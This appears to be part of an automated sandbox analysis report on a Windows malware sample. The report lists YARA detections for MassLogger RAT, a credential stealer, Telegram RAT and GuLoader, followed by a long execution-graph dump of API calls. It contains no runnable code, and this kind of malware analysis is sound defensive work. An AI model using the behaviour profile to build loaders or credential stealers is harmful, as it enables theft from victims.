                                                                                                        MD5 hash:EBF8A74191898B4A5CD58FFE2035C1EE
                                                                                                        Has elevated privileges:true
                                                                                                        Has administrator privileges:true
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Yara matches:
                                                                                                        • Rule: JoeSecurity_MassLogger, Description: Yara detected MassLogger RAT, Source: 00000005.00000002.2670933518.0000000036672000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000005.00000002.2670933518.0000000036672000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                        • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000005.00000002.2670933518.0000000036672000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                        • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000005.00000002.2643645497.00000000017DA000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                        Reputation:low
                                                                                                        Has exited:false

                                                                                                        Reset < >

                                                                                                          Execution Graph

                                                                                                          Execution Coverage:21.2%
                                                                                                          Dynamic/Decrypted Code Coverage:13.9%
                                                                                                          Signature Coverage:20.8%
                                                                                                          Total number of Nodes:1516
                                                                                                          Total number of Limit Nodes:46
                                                                                                          execution_graph 4778 402840 4779 402bbf 18 API calls 4778->4779 4781 40284e 4779->4781 4780 402864 4783 405c05 2 API calls 4780->4783 4781->4780 4782 402bbf 18 API calls 4781->4782 4782->4780 4784 40286a 4783->4784 4806 405c2a GetFileAttributesW CreateFileW 4784->4806 4786 402877 4787 402883 GlobalAlloc 4786->4787 4788 40291a 4786->4788 4791 402911 CloseHandle 4787->4791 4792 40289c 4787->4792 4789 402922 DeleteFileW 4788->4789 4790 402935 4788->4790 4789->4790 4791->4788 4807 403258 SetFilePointer 4792->4807 4794 4028a2 4795 403242 ReadFile 4794->4795 4796 4028ab GlobalAlloc 4795->4796 4797 4028bb 4796->4797 4798 4028ef 4796->4798 4799 403027 32 API calls 4797->4799 4800 405cdc WriteFile 4798->4800 4801 4028c8 4799->4801 4802 4028fb GlobalFree 4800->4802 4804 4028e6 GlobalFree 4801->4804 4803 403027 32 API calls 4802->4803 4805 40290e 4803->4805 4804->4798 4805->4791 4806->4786 4807->4794 4808 10001000 4811 1000101b 4808->4811 4818 10001516 4811->4818 4813 10001020 4814 10001024 4813->4814 4815 10001027 GlobalAlloc 4813->4815 4816 1000153d 2 API calls 4814->4816 4815->4814 4817 10001019 4816->4817 4820 1000151c 4818->4820 4819 10001522 4819->4813 4820->4819 4821 1000152e GlobalFree 4820->4821 4821->4813 4822 401cc0 4823 402ba2 18 API calls 4822->4823 4824 401cc7 4823->4824 4825 402ba2 18 API calls 4824->4825 4826 401ccf GetDlgItem 4825->4826 4827 402531 4826->4827 4828 4029c0 4829 402ba2 18 API calls 4828->4829 4830 4029c6 4829->4830 4831 4029f9 4830->4831 4833 40281e 4830->4833 4834 4029d4 4830->4834 4832 406077 18 API calls 4831->4832 4831->4833 4832->4833 4834->4833 4836 405f9c wsprintfW 4834->4836 4836->4833 4200 403c41 4201 403d94 4200->4201 4202 403c59 4200->4202 4204 403de5 4201->4204 4205 403da5 GetDlgItem GetDlgItem 4201->4205 4202->4201 4203 403c65 4202->4203 4207 403c70 SetWindowPos 4203->4207 4208 403c83 4203->4208 4206 403e3f 4204->4206 4214 401389 2 API calls 4204->4214 4209 404119 19 API calls 4205->4209 4210 404165 SendMessageW 4206->4210 4231 403d8f 4206->4231 4207->4208 4211 403ca0 4208->4211 4212 403c88 ShowWindow 4208->4212 4213 403dcf SetClassLongW 4209->4213 4243 403e51 4210->4243 4215 403cc2 4211->4215 4216 403ca8 DestroyWindow 4211->4216 4212->4211 4217 40140b 2 API calls 4213->4217 4218 403e17 4214->4218 4220 403cc7 SetWindowLongW 4215->4220 4221 403cd8 4215->4221 4219 4040c3 4216->4219 4217->4204 4218->4206 4224 403e1b SendMessageW 4218->4224 4230 4040d3 ShowWindow 4219->4230 4219->4231 4220->4231 4222 403d81 4221->4222 4223 403ce4 GetDlgItem 4221->4223 4280 404180 4222->4280 4227 403d14 4223->4227 4228 403cf7 SendMessageW IsWindowEnabled 4223->4228 4224->4231 4225 40140b 2 API calls 4225->4243 4226 4040a4 DestroyWindow EndDialog 4226->4219 4233 403d21 4227->4233 4234 403d68 SendMessageW 4227->4234 4235 403d34 4227->4235 4245 403d19 4227->4245 4228->4227 4228->4231 4230->4231 4232 406077 18 API calls 4232->4243 4233->4234 4233->4245 4234->4222 4238 403d51 4235->4238 4239 403d3c 4235->4239 4237 403d4f 4237->4222 4241 40140b 2 API calls 4238->4241 4242 40140b 2 API calls 4239->4242 4240 404119 19 API calls 4240->4243 4244 403d58 4241->4244 4242->4245 4243->4225 4243->4226 4243->4231 4243->4232 4243->4240 4261 403fe4 DestroyWindow 4243->4261 4271 404119 4243->4271 4244->4222 4244->4245 4277 4040f2 4245->4277 4247 403ecc GetDlgItem 4248 403ee1 4247->4248 4249 403ee9 ShowWindow KiUserCallbackDispatcher 4247->4249 4248->4249 4274 40413b EnableWindow 4249->4274 4251 403f13 EnableWindow 4254 403f27 4251->4254 4252 403f2c GetSystemMenu EnableMenuItem SendMessageW 4253 403f5c SendMessageW 4252->4253 4252->4254 4253->4254 4254->4252 4275 40414e SendMessageW 4254->4275 4276 406055 lstrcpynW 4254->4276 4257 403f8a lstrlenW 4258 406077 18 API calls 4257->4258 4259 403fa0 SetWindowTextW 4258->4259 4260 401389 2 API calls 4259->4260 4260->4243 4261->4219 4262 403ffe CreateDialogParamW 4261->4262 4262->4219 4263 404031 4262->4263 4264 404119 19 API calls 4263->4264 4265 40403c GetDlgItem GetWindowRect ScreenToClient SetWindowPos 4264->4265 4266 401389 2 API calls 4265->4266 4267 404082 4266->4267 4267->4231 4268 40408a ShowWindow 4267->4268 4269 404165 SendMessageW 4268->4269 4270 4040a2 4269->4270 4270->4219 4272 406077 18 API calls 4271->4272 4273 404124 SetDlgItemTextW 4272->4273 4273->4247 4274->4251 4275->4254 4276->4257 4278 4040f9 4277->4278 4279 4040ff SendMessageW 4277->4279 4278->4279 4279->4237 4281 404198 GetWindowLongW 4280->4281 4291 404221 4280->4291 4282 4041a9 4281->4282 4281->4291 4283 4041b8 GetSysColor 4282->4283 4284 4041bb 4282->4284 4283->4284 4285 4041c1 SetTextColor 4284->4285 4286 4041cb SetBkMode 4284->4286 4285->4286 4287 4041e3 GetSysColor 4286->4287 4288 4041e9 4286->4288 4287->4288 4289 4041f0 SetBkColor 4288->4289 4290 4041fa 4288->4290 4289->4290 4290->4291 4292 404214 CreateBrushIndirect 4290->4292 4293 40420d DeleteObject 4290->4293 4291->4231 4292->4291 4293->4292 4294 401fc3 4295 401fd5 4294->4295 4305 402087 4294->4305 4317 402bbf 4295->4317 4297 401423 25 API calls 4303 4021e1 4297->4303 4299 402bbf 18 API calls 4300 401fe5 4299->4300 4301 401ffb LoadLibraryExW 4300->4301 4302 401fed GetModuleHandleW 4300->4302 4304 40200c 4301->4304 4301->4305 4302->4301 4302->4304 4323 40649a WideCharToMultiByte 4304->4323 4305->4297 4308 402056 4312 4051b4 25 API calls 4308->4312 4309 40201d 4310 402025 4309->4310 4311 40203c 4309->4311 4368 401423 4310->4368 4326 10001759 4311->4326 4314 40202d 4312->4314 4314->4303 4315 402079 FreeLibrary 4314->4315 4315->4303 4318 402bcb 4317->4318 4319 406077 18 API calls 4318->4319 4320 402bec 4319->4320 4321 401fdc 4320->4321 4322 4062e9 5 API calls 4320->4322 4321->4299 4322->4321 4324 4064c4 GetProcAddress 4323->4324 4325 402017 4323->4325 4324->4325 4325->4308 4325->4309 4327 10001789 4326->4327 4371 10001b18 4327->4371 4329 10001790 4330 100018a6 4329->4330 4331 100017a1 4329->4331 4332 100017a8 4329->4332 4330->4314 4420 10002286 4331->4420 4403 100022d0 4332->4403 4337 1000180c 4343 10001812 4337->4343 4344 1000184e 4337->4344 4338 100017ee 4433 100024a9 4338->4433 4339 100017d7 4353 100017cd 4339->4353 4430 10002b5f 4339->4430 4340 100017be 4342 100017c4 4340->4342 4347 100017cf 4340->4347 4342->4353 4414 100028a4 4342->4414 4349 100015b4 2 API calls 4343->4349 4345 100024a9 10 API calls 4344->4345 4351 10001840 4345->4351 4346 100017f4 4444 100015b4 4346->4444 4424 10002645 4347->4424 4355 10001828 4349->4355 4359 10001895 4351->4359 4452 1000246c 4351->4452 4353->4337 4353->4338 4358 100024a9 10 API calls 4355->4358 4357 100017d5 4357->4353 4358->4351 4359->4330 4363 1000189f GlobalFree 4359->4363 4363->4330 4365 10001881 4365->4359 4456 1000153d 4365->4456 4366 1000187a FreeLibrary 4366->4365 4369 4051b4 25 API calls 4368->4369 4370 401431 4369->4370 4370->4314 4460 1000121b GlobalAlloc 4371->4460 4373 10001b3c 4461 1000121b GlobalAlloc 4373->4461 4375 10001d7a GlobalFree GlobalFree GlobalFree 4376 10001d97 4375->4376 4393 10001de1 4375->4393 4377 100020ee 4376->4377 4385 10001dac 4376->4385 4376->4393 4379 10002110 GetModuleHandleW 4377->4379 4377->4393 4378 10001c1d GlobalAlloc 4396 10001b47 4378->4396 4381 10002121 LoadLibraryW 4379->4381 4382 10002136 4379->4382 4380 10001c86 GlobalFree 4380->4396 4381->4382 4381->4393 4468 100015ff WideCharToMultiByte GlobalAlloc WideCharToMultiByte GetProcAddress GlobalFree 4382->4468 4383 10001c68 lstrcpyW 4386 10001c72 lstrcpyW 4383->4386 4385->4393 4464 1000122c 4385->4464 4386->4396 4387 10002188 4389 10002195 lstrlenW 4387->4389 4387->4393 4388 10002048 4388->4393 4397 10002090 lstrcpyW 4388->4397 4469 100015ff WideCharToMultiByte GlobalAlloc WideCharToMultiByte GetProcAddress GlobalFree 4389->4469 4393->4329 4394 10002148 4394->4387 4402 10002172 GetProcAddress 4394->4402 4395 100021af 4395->4393 4396->4375 4396->4378 4396->4380 4396->4383 4396->4386 4396->4388 4396->4393 4398 10001cc4 4396->4398 4399 10001f37 GlobalFree 4396->4399 4401 1000122c 2 API calls 4396->4401 4467 1000121b GlobalAlloc 4396->4467 4397->4393 4398->4396 4462 1000158f GlobalSize GlobalAlloc 4398->4462 4399->4396 4401->4396 4402->4387 4410 100022e8 4403->4410 4405 10002415 GlobalFree 4409 100017ae 4405->4409 4405->4410 4406 100023d3 lstrlenW 4406->4405 4413 100023de 4406->4413 4407 100023ba GlobalAlloc CLSIDFromString 4407->4405 4408 1000238f GlobalAlloc WideCharToMultiByte 4408->4405 4409->4339 4409->4340 4409->4353 4410->4405 4410->4406 4410->4407 4410->4408 4411 1000122c GlobalAlloc lstrcpynW 4410->4411 4471 100012ba 4410->4471 4411->4410 4413->4405 4475 100025d9 4413->4475 4416 100028b6 4414->4416 4415 1000295b SetFilePointer 4417 10002979 4415->4417 4416->4415 4418 10002a75 4417->4418 4419 10002a6a GetLastError 4417->4419 4418->4353 4419->4418 4421 10002296 4420->4421 4422 100017a7 4420->4422 4421->4422 4423 100022a8 GlobalAlloc 4421->4423 4422->4332 4423->4421 4428 10002661 4424->4428 4425 100026b2 GlobalAlloc 4429 100026d4 4425->4429 4426 100026c5 4427 100026ca GlobalSize 4426->4427 4426->4429 4427->4429 4428->4425 4428->4426 4429->4357 4431 10002b6a 4430->4431 4432 10002baa GlobalFree 4431->4432 4478 1000121b GlobalAlloc 4433->4478 4435 10002530 StringFromGUID2 4441 100024b3 4435->4441 4436 10002541 lstrcpynW 4436->4441 4437 1000250b MultiByteToWideChar 4437->4441 4438 10002571 GlobalFree 4438->4441 4439 10002554 wsprintfW 4439->4441 4440 100025ac GlobalFree 4440->4346 4441->4435 4441->4436 4441->4437 4441->4438 4441->4439 4441->4440 4442 10001272 2 API calls 4441->4442 4479 100012e1 4441->4479 4442->4441 4483 1000121b GlobalAlloc 4444->4483 4446 100015ba 4447 100015cc lstrcpyW 4446->4447 4448 100015e1 4446->4448 4447->4448 4449 10001272 4448->4449 4450 100012b5 GlobalFree 4449->4450 4451 1000127b GlobalAlloc lstrcpynW 4449->4451 4450->4351 4451->4450 4453 1000247a 4452->4453 4454 10001861 4452->4454 4453->4454 4455 10002496 GlobalFree 4453->4455 4454->4365 4454->4366 4455->4453 4457 10001555 4456->4457 4458 10001272 2 API calls 4457->4458 4459 1000155e 4458->4459 4459->4359 4460->4373 4461->4396 4463 100015ad 4462->4463 4463->4398 4470 1000121b GlobalAlloc 4464->4470 4466 1000123b lstrcpynW 4466->4393 4467->4396 4468->4394 4469->4395 4470->4466 4472 100012c1 4471->4472 4473 1000122c 2 API calls 4472->4473 4474 100012df 4473->4474 4474->4410 4476 100025e7 VirtualAlloc 4475->4476 4477 1000263d 4475->4477 4476->4477 4477->4413 4478->4441 4480 100012ea 4479->4480 4481 1000130c 4479->4481 4480->4481 4482 100012f0 lstrcpyW 4480->4482 4481->4441 4482->4481 4483->4446 4837 4016c4 4838 402bbf 18 API calls 4837->4838 4839 4016ca GetFullPathNameW 4838->4839 4840 4016e4 4839->4840 4841 401706 4839->4841 4840->4841 4844 406398 2 API calls 4840->4844 4842 40171b GetShortPathNameW 4841->4842 4843 402a4c 4841->4843 4842->4843 4845 4016f6 4844->4845 4845->4841 4847 406055 lstrcpynW 4845->4847 4847->4841 4848 4014cb 4849 4051b4 25 API calls 4848->4849 4850 4014d2 4849->4850 4851 40194e 4852 402bbf 18 API calls 4851->4852 4853 401955 lstrlenW 4852->4853 4854 402531 4853->4854 4855 4027ce 4856 4027d6 4855->4856 4857 4027da FindNextFileW 4856->4857 4860 4027ec 4856->4860 4858 402833 4857->4858 4857->4860 4861 406055 lstrcpynW 4858->4861 4861->4860 4681 401754 4682 402bbf 18 API calls 4681->4682 4683 40175b 4682->4683 4684 405c59 2 API calls 4683->4684 4685 401762 4684->4685 4686 405c59 2 API calls 4685->4686 4686->4685 4862 401d56 GetDC GetDeviceCaps 4863 402ba2 18 API calls 4862->4863 4864 401d74 MulDiv ReleaseDC 4863->4864 4865 402ba2 18 API calls 4864->4865 4866 401d93 4865->4866 4867 406077 18 API calls 4866->4867 4868 401dcc CreateFontIndirectW 4867->4868 4869 402531 4868->4869 4870 401a57 4871 402ba2 18 API calls 4870->4871 4872 401a5d 4871->4872 4873 402ba2 18 API calls 4872->4873 4874 401a05 4873->4874 4875 4014d7 4876 402ba2 18 API calls 4875->4876 4877 4014dd Sleep 4876->4877 4879 402a4c 4877->4879 4880 40155b 4881 4029f2 4880->4881 4884 405f9c wsprintfW 4881->4884 4883 4029f7 4884->4883 4760 401ddc 4761 402ba2 18 API calls 4760->4761 4762 401de2 4761->4762 4763 402ba2 18 API calls 4762->4763 4764 401deb 4763->4764 4765 401df2 ShowWindow 4764->4765 4766 401dfd EnableWindow 4764->4766 4767 402a4c 4765->4767 4766->4767 4885 40385c 4886 403867 4885->4886 4887 40386b 4886->4887 4888 40386e GlobalAlloc 4886->4888 4888->4887 4889 4022df 4890 402bbf 18 API calls 4889->4890 4891 4022ee 4890->4891 4892 402bbf 18 API calls 4891->4892 4893 4022f7 4892->4893 4894 402bbf 18 API calls 4893->4894 4895 402301 GetPrivateProfileStringW 4894->4895 4896 401bdf 4897 402ba2 18 API calls 4896->4897 4898 401be6 4897->4898 4899 402ba2 18 API calls 4898->4899 4900 401bf0 4899->4900 4901 401c00 4900->4901 4902 402bbf 18 API calls 4900->4902 4903 401c10 4901->4903 4904 402bbf 18 API calls 4901->4904 4902->4901 4905 401c1b 4903->4905 4906 401c5f 4903->4906 4904->4903 4908 402ba2 18 API calls 4905->4908 4907 402bbf 18 API calls 4906->4907 4909 401c64 4907->4909 4910 401c20 4908->4910 4911 402bbf 18 API calls 4909->4911 4912 402ba2 18 API calls 4910->4912 4913 401c6d FindWindowExW 4911->4913 4914 401c29 4912->4914 4917 401c8f 4913->4917 4915 401c31 SendMessageTimeoutW 4914->4915 4916 401c4f SendMessageW 4914->4916 4915->4917 4916->4917 4918 401960 4919 402ba2 18 API calls 4918->4919 4920 401967 4919->4920 4921 402ba2 18 API calls 4920->4921 4922 401971 4921->4922 4923 402bbf 18 API calls 4922->4923 4924 40197a 4923->4924 4925 40198e lstrlenW 4924->4925 4926 4019ca 4924->4926 4927 401998 4925->4927 4927->4926 4931 406055 lstrcpynW 4927->4931 4929 4019b3 4929->4926 4930 4019c0 lstrlenW 4929->4930 4930->4926 4931->4929 4932 401662 4933 402bbf 18 API calls 4932->4933 4934 401668 4933->4934 4935 406398 2 API calls 4934->4935 4936 40166e 4935->4936 4937 4019e4 4938 402bbf 18 API calls 4937->4938 4939 4019eb 4938->4939 4940 402bbf 18 API calls 4939->4940 4941 4019f4 4940->4941 4942 4019fb lstrcmpiW 4941->4942 4943 401a0d lstrcmpW 4941->4943 4944 401a01 4942->4944 4943->4944 4484 4025e5 4498 402ba2 4484->4498 4486 40263a ReadFile 4493 4025f4 4486->4493 4497 40272d 4486->4497 4487 4026d3 4487->4493 4487->4497 4501 405d0b SetFilePointer 4487->4501 4488 405cad ReadFile 4488->4493 4490 40267a MultiByteToWideChar 4490->4493 4491 40272f 4510 405f9c wsprintfW 4491->4510 4493->4486 4493->4487 4493->4488 4493->4490 4493->4491 4494 4026a0 SetFilePointer MultiByteToWideChar 4493->4494 4495 402740 4493->4495 4493->4497 4494->4493 4496 402761 SetFilePointer 4495->4496 4495->4497 4496->4497 4499 406077 18 API calls 4498->4499 4500 402bb6 4499->4500 4500->4493 4502 405d27 4501->4502 4503 405d43 4501->4503 4504 405cad ReadFile 4502->4504 4503->4487 4505 405d33 4504->4505 4505->4503 4506 405d74 SetFilePointer 4505->4506 4507 405d4c SetFilePointer 4505->4507 4506->4503 4507->4506 4508 405d57 4507->4508 4509 405cdc WriteFile 4508->4509 4509->4503 4510->4497 4945 401e66 4946 402bbf 18 API calls 4945->4946 4947 401e6c 4946->4947 4948 4051b4 25 API calls 4947->4948 4949 401e76 4948->4949 4950 405735 2 API calls 4949->4950 4951 401e7c 4950->4951 4952 401edb CloseHandle 4951->4952 4953 401e8c WaitForSingleObject 4951->4953 4954 40281e 4951->4954 4952->4954 4955 401e9e 4953->4955 4956 401eb0 GetExitCodeProcess 4955->4956 4957 406467 2 API calls 4955->4957 4958 401ec2 4956->4958 4959 401ecd 4956->4959 4960 401ea5 WaitForSingleObject 4957->4960 4962 405f9c wsprintfW 4958->4962 4959->4952 4960->4955 4962->4959 4520 401767 4521 402bbf 18 API calls 4520->4521 4522 40176e 4521->4522 4523 401796 4522->4523 4524 40178e 4522->4524 4561 406055 lstrcpynW 4523->4561 4560 406055 lstrcpynW 4524->4560 4527 401794 4530 4062e9 5 API calls 4527->4530 4528 4017a1 4529 405a09 3 API calls 4528->4529 4531 4017a7 lstrcatW 4529->4531 4539 4017b3 4530->4539 4531->4527 4532 406398 2 API calls 4532->4539 4533 4017ef 4534 405c05 2 API calls 4533->4534 4534->4539 4536 4017c5 CompareFileTime 4536->4539 4537 401885 4538 4051b4 25 API calls 4537->4538 4541 40188f 4538->4541 4539->4532 4539->4533 4539->4536 4539->4537 4540 406055 lstrcpynW 4539->4540 4546 406077 18 API calls 4539->4546 4554 40579a MessageBoxIndirectW 4539->4554 4557 40185c 4539->4557 4559 405c2a GetFileAttributesW CreateFileW 4539->4559 4540->4539 4543 403027 32 API calls 4541->4543 4542 4051b4 25 API calls 4558 401871 4542->4558 4544 4018a2 4543->4544 4545 4018b6 SetFileTime 4544->4545 4547 4018c8 CloseHandle 4544->4547 4545->4547 4546->4539 4548 4018d9 4547->4548 4547->4558 4549 4018f1 4548->4549 4550 4018de 4548->4550 4552 406077 18 API calls 4549->4552 4551 406077 18 API calls 4550->4551 4555 4018e6 lstrcatW 4551->4555 4553 4018f9 4552->4553 4556 40579a MessageBoxIndirectW 4553->4556 4554->4539 4555->4553 4556->4558 4557->4542 4557->4558 4559->4539 4560->4527 4561->4528 4963 404267 lstrlenW 4964 404286 4963->4964 4965 404288 WideCharToMultiByte 4963->4965 4964->4965 4966 401ee9 4967 402bbf 18 API calls 4966->4967 4968 401ef0 4967->4968 4969 406398 2 API calls 4968->4969 4970 401ef6 4969->4970 4971 401f07 4970->4971 4973 405f9c wsprintfW 4970->4973 4973->4971 4974 100018a9 4975 100018cc 4974->4975 4976 10001911 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z __allrem 4975->4976 4977 100018ff GlobalFree 4975->4977 4978 10001272 2 API calls 4976->4978 4977->4976 4979 10001a87 GlobalFree GlobalFree 4978->4979 4980 4021ea 4981 402bbf 18 API calls 4980->4981 4982 4021f0 4981->4982 4983 402bbf 18 API calls 4982->4983 4984 4021f9 4983->4984 4985 402bbf 18 API calls 4984->4985 4986 402202 4985->4986 4987 406398 2 API calls 4986->4987 4988 40220b 4987->4988 4989 40221c lstrlenW lstrlenW 4988->4989 4990 40220f 4988->4990 4992 4051b4 25 API calls 4989->4992 4991 4051b4 25 API calls 4990->4991 4994 402217 4990->4994 4991->4994 4993 40225a SHFileOperationW 4992->4993 4993->4990 4993->4994 4995 40156b 4996 401584 4995->4996 4997 40157b ShowWindow 4995->4997 4998 401592 ShowWindow 4996->4998 4999 402a4c 4996->4999 4997->4996 4998->4999 5000 40456d 5001 4045a3 5000->5001 5002 40457d 5000->5002 5004 404180 8 API calls 5001->5004 5003 404119 19 API calls 5002->5003 5005 40458a SetDlgItemTextW 5003->5005 5006 4045af 5004->5006 5005->5001 5007 40226e 5008 402275 5007->5008 5010 402288 5007->5010 5009 406077 18 API calls 5008->5009 5011 402282 5009->5011 5012 40579a MessageBoxIndirectW 5011->5012 5012->5010 5013 4014f1 SetForegroundWindow 5014 402a4c 5013->5014 5015 401673 5016 402bbf 18 API calls 5015->5016 5017 40167a 5016->5017 5018 402bbf 18 API calls 5017->5018 5019 401683 5018->5019 5020 402bbf 18 API calls 5019->5020 5021 40168c MoveFileW 5020->5021 5022 40169f 5021->5022 5028 401698 5021->5028 5024 406398 2 API calls 5022->5024 5026 4021e1 5022->5026 5023 401423 25 API calls 5023->5026 5025 4016ae 5024->5025 5025->5026 5027 405ef6 38 API calls 5025->5027 5027->5028 5028->5023 5029 4052f3 5030 405314 GetDlgItem GetDlgItem GetDlgItem 5029->5030 5031 40549d 5029->5031 5074 40414e SendMessageW 5030->5074 5033 4054a6 GetDlgItem CreateThread CloseHandle 5031->5033 5034 4054ce 5031->5034 5033->5034 5036 4054f9 5034->5036 5037 4054e5 ShowWindow ShowWindow 5034->5037 5038 40551e 5034->5038 5035 405384 5043 40538b GetClientRect GetSystemMetrics SendMessageW SendMessageW 5035->5043 5040 405533 ShowWindow 5036->5040 5041 40550d 5036->5041 5044 405559 5036->5044 5076 40414e SendMessageW 5037->5076 5042 404180 8 API calls 5038->5042 5047 405553 5040->5047 5048 405545 5040->5048 5045 4040f2 SendMessageW 5041->5045 5046 40552c 5042->5046 5049 4053f9 5043->5049 5050 4053dd SendMessageW SendMessageW 5043->5050 5044->5038 5051 405567 SendMessageW 5044->5051 5045->5038 5056 4040f2 SendMessageW 5047->5056 5055 4051b4 25 API calls 5048->5055 5052 40540c 5049->5052 5053 4053fe SendMessageW 5049->5053 5050->5049 5051->5046 5054 405580 CreatePopupMenu 5051->5054 5058 404119 19 API calls 5052->5058 5053->5052 5057 406077 18 API calls 5054->5057 5055->5047 5056->5044 5059 405590 AppendMenuW 5057->5059 5060 40541c 5058->5060 5061 4055c0 TrackPopupMenu 5059->5061 5062 4055ad GetWindowRect 5059->5062 5063 405425 ShowWindow 5060->5063 5064 405459 GetDlgItem SendMessageW 5060->5064 5061->5046 5065 4055db 5061->5065 5062->5061 5066 405448 5063->5066 5067 40543b ShowWindow 5063->5067 5064->5046 5068 405480 SendMessageW SendMessageW 5064->5068 5069 4055f7 SendMessageW 5065->5069 5075 40414e SendMessageW 5066->5075 5067->5066 5068->5046 5069->5069 5070 405614 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 5069->5070 5072 405639 SendMessageW 5070->5072 5072->5072 5073 405662 GlobalUnlock SetClipboardData CloseClipboard 5072->5073 5073->5046 5074->5035 5075->5064 5076->5036 5077 100016b6 5078 100016e5 5077->5078 5079 10001b18 22 API calls 5078->5079 5080 100016ec 5079->5080 5081 100016f3 5080->5081 5082 100016ff 5080->5082 5083 10001272 2 API calls 5081->5083 5084 10001726 5082->5084 5085 10001709 5082->5085 5088 100016fd 5083->5088 5086 10001750 5084->5086 5087 1000172c 5084->5087 5089 1000153d 2 API calls 5085->5089 5091 1000153d 2 API calls 5086->5091 5090 100015b4 2 API calls 5087->5090 5092 1000170e 5089->5092 5093 10001731 5090->5093 5091->5088 5094 100015b4 2 API calls 5092->5094 5095 10001272 2 API calls 5093->5095 5096 10001714 5094->5096 5097 10001737 GlobalFree 5095->5097 5098 10001272 2 API calls 5096->5098 5097->5088 5099 1000174b GlobalFree 5097->5099 5100 1000171a GlobalFree 5098->5100 5099->5088 5100->5088 5101 10002238 5102 10002296 5101->5102 5104 100022cc 5101->5104 5103 100022a8 GlobalAlloc 5102->5103 5102->5104 5103->5102 5105 401cfa GetDlgItem GetClientRect 5106 402bbf 18 API calls 5105->5106 5107 401d2c LoadImageW SendMessageW 5106->5107 5108 401d4a DeleteObject 5107->5108 5109 402a4c 5107->5109 5108->5109 4729 4027fb 4730 402bbf 18 API calls 4729->4730 4731 402802 FindFirstFileW 4730->4731 4732 40282a 4731->4732 4736 402815 4731->4736 4733 402833 4732->4733 4737 405f9c wsprintfW 4732->4737 4738 406055 lstrcpynW 4733->4738 4737->4733 4738->4736 4739 40237b 4740 402381 4739->4740 4741 402bbf 18 API calls 4740->4741 4742 402393 4741->4742 4743 402bbf 18 API calls 4742->4743 4744 40239d RegCreateKeyExW 4743->4744 4745 4023c7 4744->4745 4747 40281e 4744->4747 4746 4023e2 4745->4746 4748 402bbf 18 API calls 4745->4748 4750 402ba2 18 API calls 4746->4750 4752 4023ee 4746->4752 4749 4023d8 lstrlenW 4748->4749 4749->4746 4750->4752 4751 402409 RegSetValueExW 4754 40241f RegCloseKey 4751->4754 4752->4751 4753 403027 32 API calls 4752->4753 4753->4751 4754->4747 5110 1000103d 5111 1000101b 4 API calls 5110->5111 5112 10001056 5111->5112 5113 4014ff 5114 401507 5113->5114 5116 40151a 5113->5116 5115 402ba2 18 API calls 5114->5115 5115->5116 5117 401000 5118 401037 BeginPaint GetClientRect 5117->5118 5119 40100c DefWindowProcW 5117->5119 5121 4010f3 5118->5121 5122 401179 5119->5122 5123 401073 CreateBrushIndirect FillRect DeleteObject 5121->5123 5124 4010fc 5121->5124 5123->5121 5125 401102 CreateFontIndirectW 5124->5125 5126 401167 EndPaint 5124->5126 5125->5126 5127 401112 6 API calls 5125->5127 5126->5122 5127->5126 5128 401904 5129 40193b 5128->5129 5130 402bbf 18 API calls 5129->5130 5131 401940 5130->5131 5132 405846 69 API calls 5131->5132 5133 401949 5132->5133 5134 402d04 5135 402d16 SetTimer 5134->5135 5137 402d2f 5134->5137 5135->5137 5136 402d84 5137->5136 5138 402d49 MulDiv wsprintfW SetWindowTextW SetDlgItemTextW 5137->5138 5138->5136 4511 402786 4512 4029f7 4511->4512 4513 40278d 4511->4513 4514 402ba2 18 API calls 4513->4514 4515 402798 4514->4515 4516 40279f SetFilePointer 4515->4516 4516->4512 4517 4027af 4516->4517 4519 405f9c wsprintfW 4517->4519 4519->4512 4562 100027c7 4563 10002817 4562->4563 4564 100027d7 VirtualProtect 4562->4564 4564->4563 5139 401907 5140 402bbf 18 API calls 5139->5140 5141 40190e 5140->5141 5142 40579a MessageBoxIndirectW 5141->5142 5143 401917 5142->5143 5144 401e08 5145 402bbf 18 API calls 5144->5145 5146 401e0e 5145->5146 5147 402bbf 18 API calls 5146->5147 5148 401e17 5147->5148 5149 402bbf 18 API calls 5148->5149 5150 401e20 5149->5150 5151 402bbf 18 API calls 5150->5151 5152 401e29 5151->5152 5153 401423 25 API calls 5152->5153 5154 401e30 ShellExecuteW 5153->5154 5155 401e61 5154->5155 5161 40490a 5162 404936 5161->5162 5163 40491a 5161->5163 5165 404969 5162->5165 5166 40493c SHGetPathFromIDListW 5162->5166 5172 40577e GetDlgItemTextW 5163->5172 5168 404953 SendMessageW 5166->5168 5169 40494c 5166->5169 5167 404927 SendMessageW 5167->5162 5168->5165 5171 40140b 2 API calls 5169->5171 5171->5168 5172->5167 5173 1000164f 5174 10001516 GlobalFree 5173->5174 5176 10001667 5174->5176 5175 100016ad GlobalFree 5176->5175 5177 10001682 5176->5177 5178 10001699 VirtualFree 5176->5178 5177->5175 5178->5175 4687 402095 4688 402bbf 18 API calls 4687->4688 4689 40209c 4688->4689 4690 402bbf 18 API calls 4689->4690 4691 4020a6 4690->4691 4692 402bbf 18 API calls 4691->4692 4693 4020b0 4692->4693 4694 402bbf 18 API calls 4693->4694 4695 4020ba 4694->4695 4696 402bbf 18 API calls 4695->4696 4698 4020c4 4696->4698 4697 402103 CoCreateInstance 4702 402122 4697->4702 4698->4697 4699 402bbf 18 API calls 4698->4699 4699->4697 4700 401423 25 API calls 4701 4021e1 4700->4701 4702->4700 4702->4701 5179 401a15 5180 402bbf 18 API calls 5179->5180 5181 401a1e ExpandEnvironmentStringsW 5180->5181 5182 401a32 5181->5182 5184 401a45 5181->5184 5183 401a37 lstrcmpW 5182->5183 5182->5184 5183->5184 5185 402515 5186 402bbf 18 API calls 5185->5186 5187 40251c 5186->5187 5190 405c2a GetFileAttributesW CreateFileW 5187->5190 5189 402528 5190->5189 5191 401b16 5192 402bbf 18 API calls 5191->5192 5193 401b1d 5192->5193 5194 402ba2 18 API calls 5193->5194 5195 401b26 wsprintfW 5194->5195 5196 402a4c 5195->5196 5197 10001058 5199 